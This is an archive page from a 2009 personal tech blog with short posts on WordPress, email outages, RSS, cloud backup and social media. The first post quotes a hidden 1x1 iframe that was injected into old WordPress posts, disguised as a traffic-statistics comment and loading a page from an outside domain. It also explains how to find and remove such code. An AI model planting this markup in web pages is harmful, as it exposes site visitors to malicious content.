Posts by author:

Aziz Poonawalla

annoying html injection in wordpress

by Aziz Poonawalla on September 13, 2009

two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows:

<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing source of the archives page revealed the hack – probably from some window of time in which I hadnt upgraded to the latest wordpress version.

To ensure you don’t have old posts in your archives with this exploit, just search your posts for the term “iframe”. Edit those posts and you’ll likely as not find similar code to above.

Wordpress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better is WP had a incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just like you can set in Windows. Ideally, this would be controlled by a setting in the Dashboard to “turn on/off automatic security patches” and when enabled, would “register” your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next login to Dashboard the patch is automatically applied.

{ 1 comment }

First gmail, now Yahoo mail is down

by Aziz Poonawalla on September 3, 2009

good grief, it looks like it’s Yahoo Mail’s turn to go down in flames:

Yahoo Mail error message

Yahoo Mail error message

I’m sure they will have service restored soon. But it’s particularly more galling given that 1. I snarkily defended Yahoo Mail during the gmail outage (oh, karma!) and 2. unlike gmail, I’m a paying customer for Yahoo’s Plus service (no ads, more storage, extra features including mail aliases).

This, in a nutshell, is why the Cloud sucks. But even these hassles aren’t enough to make me want to go back to the Eudora days where I had to manage my own mail archives locally. Email is inherently a pain no matter how you do it – the only real way to be free of it is to declare Email Independence.

{ 0 comments }

RSS is dead; long live RSS!

September 1, 2009

I was quite perplexed to see this article at ZDNet on techmeme, arguing that RSS is a failure. Now, I’ve been relying less and less on Google Reader myself as a source of news as well, but that’s not because of a failure in RSS technology but rather the obsolesence of Google Reader in the [...]

Read the full article →

a perplexing paucity of PHP programmers

August 27, 2009

My friend Abbas Ali, who is one of the lead programmers for the open-source Coppermine gallery project, writes with mild frustration about the seeming shortage of talented PHP programmers in India. He cites a number of reasons, one of which is a lack of good trainers:
Unfortunately in India you need a trainer for learning programming [...]

Read the full article →

Tags to Hashtags

August 21, 2009

I’ve written a new plugin for wordpress entitled “AHP Tags to Hashtags” for use with Wordpress and Wordpress MU. The plugin can be found for now at pastebin here, I will update when it’s been added to the official wordpress plugin repository.
The plugin appends the tags for each post to the post title in the [...]

Read the full article →

backups should be local, not to the cloud

August 12, 2009

One of the lessons of Friendfeed’s buyout by Facebook is that the cloud is not a good place for backup. In an era of the sub-$100 terabyte, the idea that the best place for our data should be anywhere other than right at home is a strange one. Cloud backup is useful as a meta-backup [...]

Read the full article →

true blue: facebook friends friendfeed, whales on twitter

August 10, 2009

his is potentially huge – Facebook has acquired Friendfeed:
Obviously Facebook has already built out some of FriendFeed’s functionality so there is some overlap, but there are still numerous ways FriendFeed beats out Facebook’s News Feed setup. One of these is the way stories are ‘floated’ to the top as new users comment on them. And [...]

Read the full article →

Microsoft Bing: But It ’s Not Google!

July 13, 2009

I’ve been increasingly using Microsoft’s new search engine, Bing in lieu of Google for my casual searches. One of the things that appeals to me is how the search results are so much more organized and comprehensive than just a list of ten text items. Google’s spartan deisgn was cool and chic ten years ago [...]

Read the full article →

One Million Strong for @aplusk

April 17, 2009

Ashton Kutcher has done it – he has amassed one million followers. He’s using this publicity to donate mosquito nets to African children, but that’s just scratching the surface of what is possible.
Use your imagination.. what could he do, with his combination of celebrity and follower clout?
- he could raise money for a [...]

Read the full article →

The End of Twitter: You can stop tweeting now

March 20, 2009

This is the Final Tweet to End All Tweets.

Twitter is Over. This is Twitter’s End. There are No More Tweets.
(inspired by the eoti)

Read the full article →

← Previous Entries